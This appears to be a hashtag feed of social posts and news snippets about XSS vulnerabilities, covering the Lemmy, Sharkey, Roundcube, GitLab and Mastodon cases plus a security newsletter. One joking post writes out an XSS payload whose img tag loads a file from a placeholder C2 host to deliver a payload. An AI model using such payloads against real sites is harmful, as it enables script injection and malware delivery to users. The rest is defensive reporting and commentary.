Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog
#Sharkey's recent vulnerability and their handling of it is still miles better than #Lemmy's #XSS exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.
Like seriously, the first thing you do when #Markdown parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict #CSP for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals #Mastodon) using their software!
I can cut some slack for the Sharkey devs here because:
they're relatively new (only months since the project started)
it only affected note imports from #Twitter which is already niche enough
it was easy to mitigate (just disable note import)
it didn't affect single-user instances IIUC
I haven't seen any Sharkey instance get actually exploited by this
they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)
So this is not worth blowing over in the #fediverse. Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.
Development platform: New GitLab versions fix ten security vulnerabilities
Besides cross-site scripting and permission problems, the new versions of the version control system also fix DoS vulnerabilities. The GitLab team recommends updating.
Security researchers find critical flaws in the AI tools Ray, MLflow and H2O
The popular tools for AI applications suffer from code injection, illegitimate file manipulation and other bugs. Updates are not always available.
Severe security vulnerabilities in Zabbix monitoring software fixed
Various components of the Zabbix monitoring software contained critical security vulnerabilities that allowed attackers to execute their own code.
I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol
Prevention: add the .webp extension to uBlock Origin custom rules or block it at the DNS level.
Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser
@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.
Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?
Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.
#Bitwarden, like most cloud-based password managers, has a web vault. Imagine a stored #XSS on that. All your passwords stolen.
Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.
Yep, it looks like there is an XSS vulnerability in Lemmy that has been widely exploited, allowing the attackers to steal cookie credentials, including potentially those of the site admins.
Some other non-compromised Lemmy instances have taken themselves offline until a fix is available.
Kbin is not affected as far as I can see.
If you have a Lemmy account, don't use it at the moment!
Lemmy instances are being hit by an XSS attack. Stay cautious when viewing posts with weird text, as it is a JavaScript injection. Bug reported to the Lemmy devs: https://github.com/LemmyNet/lemmy-ui/issues/1895
Fediverse: Critical security vulnerabilities in Mastodon software patched
Operators of Mastodon instances must update their servers. Older versions contain critical security vulnerabilities that allow, among other things, code injection.
New Bishop Fox security advisory alert 🚨 ! Joan Bono and Luis Adrian De la Rosa Hernandez identified two #vulnerabilities in the TaskCafe #opensource tool.
These vulnerabilities include a high-risk improper access controls issue as well as a cross-site scripting (#XSS) bug. If these two issues were exploited together, an attacker could take over the admin user's account by changing the profile picture to a malicious SVG and changing the admin password to one of their choosing. Read more ⬇ https://bfx.social/43K2M10
📨 Latest issue of my curated #cybersecurity and #infosec list of resources for week #24/2023 is out! It includes, but not only:
→ 🇺🇸 🇨🇳 The US Navy, NATO, and #NASA are using a shady Chinese company’s #encryption chips
→ 🦠 🏢 #Ransomware Group Starts Naming Victims of #MOVEit Zero-Day Attacks
→ ☁️ 🪣 New Supply Chain Attack Exploits Abandoned #S3Buckets to Distribute Malicious Binaries
→ ☁️ #XSS Vulnerabilities in #Azure Led to Unauthorized Access to User Sessions
→ 🇨🇳 🦠 #Barracuda ESG zero-day attacks linked to suspected Chinese hackers
→ 🇷🇺 🇺🇸 Russian national arrested in Arizona, charged for alleged role in #LockBit ransomware attacks
→ 🇷🇺 🇺🇦 Russia-backed hackers unleash new USB-based malware on #Ukraine’s military
→ 🇺🇸 💰 LockBit Ransomware Extorts $91 Million from U.S. Companies
→ 🇷🇺 🇺🇦 #Microsoft identifies new hacking unit within Russian military intelligence
→ 🦠 Fake Researcher Profiles Spread #Malware through #GitHub Repositories as PoC Exploits
→ 🎣 👟 Massive #phishing campaign uses 6,000 sites to impersonate 100 brands
→ 🇨🇳 Chinese Cyberspies Caught Exploiting #VMware ESXi #ZeroDay
→ 🩹 Microsoft #PatchTuesday, June 2023 Edition
→ ☁️ Microsoft: Azure Portal #outage was caused by traffic “spike”
→ 🇨🇳 🇺🇸 #China's cyber now aimed at infrastructure, warns CISA boss
→ 🇰🇷 🇨🇳 Ex-Samsung executive alleged to have stolen tech to recreate chip plant in China
→ 🇨🇭 🗄️ Swiss Fear Government Data Stolen in Cyberattack
→ 🩹 🔐 #Fortinet fixes critical RCE flaw in #Fortigate SSL-VPN devices, patch now
📚 This week's recommended reading is: "The Cyber Effect: An Expert in Cyberpsychology Explains How Technology Is Shaping Our Children, Our Behavior, and Our Values — and What We Can Do About It" by Prof Mary Aiken
Subscribe to the #newsletter to have it piping hot in your inbox every Sunday ⬇️
Applying Content Security Policy in Symfony to Reduce XSS Risks (dev.to)
Protecting applications against XSS attacks is one of the most important things we can do to make...